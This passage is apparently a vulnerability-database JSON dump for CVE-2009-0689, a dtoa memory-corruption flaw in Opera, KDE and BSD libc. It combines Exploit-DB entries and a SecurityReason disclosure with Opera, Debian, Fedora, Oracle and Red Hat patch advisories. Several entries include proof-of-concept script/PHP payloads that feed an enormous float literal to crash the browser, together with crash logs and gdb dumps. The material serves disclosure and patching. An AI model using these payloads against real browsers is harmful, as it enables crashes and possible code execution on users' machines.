cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10185/"}, {"lastseen": "2016-02-03T19:01:45", "description": "Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability. CVE-2009-0689. Remote exploits for multiple platform", "published": "2009-11-20T00:00:00", "type": "exploitdb", "title": "Opera Web Browser 10.01 - 'dtoa' Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "EDB-ID:33363", "href": "https://www.exploit-db.com/exploits/33363/", "sourceData": "source: http://www.securityfocus.com/bid/37078/info\r\n\r\nOpera Web Browser is prone to a remote code-execution vulnerability.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.\r\n\r\nNOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\nThis issue affects Opera 10.01; other versions may also be affected. \r\n\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33363/"}, {"lastseen": "2016-02-03T19:01:54", "description": "KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability. CVE-2009-0689. Remote exploit for linux platform", "published": "2009-11-20T00:00:00", "type": "exploitdb", "title": "KDE 4.3.3 KDELibs 'dtoa' Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "EDB-ID:33364", "href": "https://www.exploit-db.com/exploits/33364/", "sourceData": "source: http://www.securityfocus.com/bid/37080/info\r\n\r\nKDE is prone to a remote code-execution vulnerability that affects KDELibs.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.\r\n\r\nNOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\nThis issue affects KDE KDELibs 4.3.3; other versions may also be affected.\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33364/"}, {"lastseen": "2016-02-01T12:00:29", "description": "Opera 10.01 Remote Array Overrun. CVE-2009-0689. Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "Opera 10.01 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10187", "href": "https://www.exploit-db.com/exploits/10187/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera\r\nSoftware company. The browser handles common Internet-related tasks such\r\nas displaying Web sites, sending and receiving e-mail messages, managing\r\ncontacts, IRC online chatting, downloading files via BitTorrent, and\r\nreading Web feeds. Opera is offered free of charge for personal\r\ncomputers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. Opera has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same\r\nissue like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use Opera to see this PoC, Opera will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\r\naddress 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\r\nSecurity Advisory\r\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\r\nwas updated with note :\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nIn shortly time we can expect the final verion of Opera with the fix.\r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\r\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\r\n=/IkD\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10187/"}], "opera": [{"lastseen": "2016-09-04T11:14:57", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "Passing very long strings through the string to number conversion using JavaScript in Opera may result in heap buffer overflows. This also affects the dtoa routine, and was reported in CVE-2009-0689. In most cases Opera will just freeze or terminate, but in some cases this could lead to a crash which could be used to execute code. To inject code, additional techniques will have to be employed.", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "OPERA:942", "href": "http://www.opera.com/security/advisory/942", "title": "Heap buffer overflow in string to number conversion", "type": "opera", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "The Mono runtime implements a JIT engine for the ECMA CLI virtual machine (as well as a byte code interpreter, the class loader, the garbage collector, threading system and metadata access libraries. ", "modified": "2015-12-29T22:26:22", "published": "2015-12-29T22:26:22", "id": "FEDORA:98D276087D46", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: mono-4.0.5-2.fc23", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "[3.5.4-25.0.1.el5_4.1]\n- Remove Version branding\n- Maximum rpm trademark logos removed (pics/crystalsvg/*-mime-rpm*) in tarball\n[3.5.4-25.1]\n- bump release\n[3.5.4-22.2]\n- Resolves: #539716,\n CVE-2009-0689, kdelibs remote array overrun ", "edition": 4, "modified": "2009-11-24T00:00:00", "published": "2009-11-24T00:00:00", "id": "ELSA-2009-1601", "href": "http://linux.oracle.com/errata/ELSA-2009-1601.html", "title": "kdelibs security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:12:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1998-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : kdelibs\nVulnerability : buffer overflow\nProblem type : local(remote)\nDebian-specific: no\nCVE Id(s) : CVE-2009-0689\n\nMaksymilian Arciemowicz discovered a buffer overflow in the internal \nstring routines of the KDE core libraries, which could lead to the \nexecution of arbitrary code.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 4:3.5.10.dfsg.1-0lenny4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4:3.5.10.dfsg.1-3.\n\nWe recommend that you upgrade your kdelibs packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4.dsc\n Size/MD5 checksum: 2245 d0ec82902906597bc47d5033ba82a546\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 18639393 4bcfee29b0f939415791f5032a72e7b0\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4.diff.gz\n Size/MD5 checksum: 409534 9d3508a67c82971b2fab757172ddfcd9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-data_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 8698880 a93e01cfe79111bd513209880aabb48a\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-doc_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 26411552 00bd0960371d80dfa174b4aaf351a551\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 30238 037ad749ea0182c797f16c1dd281265e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 1454014 14d233f2f53832ac2a28f75cfdd03130\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 11645354 55fed46d40bdce28aae67cf985ec401c\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 46898502 68ab0f7e5a5056f125405d915b300008\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 1449660 36f93450d57a36d9a8d4d1d2db9d43ca\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 11082858 07111fb035bfe0eda0b2441b1bba80f8\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 27426528 08898808eb9eed7b871aa571d2f9a237\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 9641676 8b316ebf3bfdd478029185a7e6d47f49\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 1442674 3b01d0efad56cd690c9cdb3e00ecee4a\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 47034292 ce8b22299bdfbb94c9b66ad3d21d4f6f\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 1433914 9a3ae9c8a3139fbd27764e9af28d2737\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 9563740 29b380d8ab706310db8912f5f67137b3\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 46539978 b24b2a5df34e29c70e5d2a280b466609\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 11577906 010821c103e2172acd60ac9454e07975\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 1448464 af5119ddb9de50bb95ae2ab6760399f9\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 27838586 00cfe209f75d904751d8fec86f1ca4d3\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 10395042 52ecd0a337e5732836367ab53d97f88f\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 26698244 909b074ce6bcaefe3d401126d2615f8d\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 1440406 c556151bb5a316eb9ab31c3935b41f3b\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 27256656 fa2b74b8ebf132cc51f03a3a67f88b94\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 1447294 359e619f9c448ea152da8ec75171ec56\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 14729196 b68fd5722d194f338f2c198a5a8ad3f3\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 1395642 4355fac1721fff347677de60f2d0c6b0\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 28275256 333044fb5317d479f48d52e6168000d9\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 9435400 02ec40a4e98c07881e383b746d7b288b\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 9302160 8258f05da522076b668b6e7f269dbacd\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 27203156 6a4dd375e27a80dde7f39c0f2060f1ff\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 1395886 65428046928c7f67b9ef5239ef60b9d4\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 28204250 f6ac77dac3bde9ca597da9145b33713b\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 1458744 9603268bf627bbacd0e7a12c3a94802f\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 10958986 a498e9f65725b5f735a9d56dca1e0829\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 11137838 f676f7a433624b3cb47cfc8e3441644c\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 1399242 db48b7910f27162734b8bad742e9b8cb\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 27719212 c1070ae61e00d808e636c183639f3ff8\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 9967244 0990757031afe40d7a01e8794a37dc94\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 1438956 42fe0dbcd6228aee3b4643836c3ff4f7\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 25484970 83d65503f4397d63079bdaa28660a43b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 3, "modified": "2010-02-17T18:25:38", "published": "2010-02-17T18:25:38", "id": "DEBIAN:DSA-1998-1:6C47A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00038.html", "title": "[SECURITY] [DSA 1998-1] New kdelibs packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:35", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "The kdelibs packages provide libraries for the K Desktop Environment (KDE).\n\nA buffer overflow flaw was found in the kdelibs string to floating point\nconversion routines. A web page containing malicious JavaScript could crash\nKonqueror or, potentially, execute arbitrary code with the privileges of the\nuser running Konqueror. (CVE-2009-0689)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The desktop must be restarted (log out, then\nlog back in) for this update to take effect.", "modified": "2017-09-08T12:09:35", "published": "2009-11-24T05:00:00", "id": "RHSA-2009:1601", "href": "https://access.redhat.com/errata/RHSA-2009:1601", "type": "redhat", "title": "(RHSA-2009:1601) Critical: kdelibs security update", "cvss": {"score": 6.8, "vector": 